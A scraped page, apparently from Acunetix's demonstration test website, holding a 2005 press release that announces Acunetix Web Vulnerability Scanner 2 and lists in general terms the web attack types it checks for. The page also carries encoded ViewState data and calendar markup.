MIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" 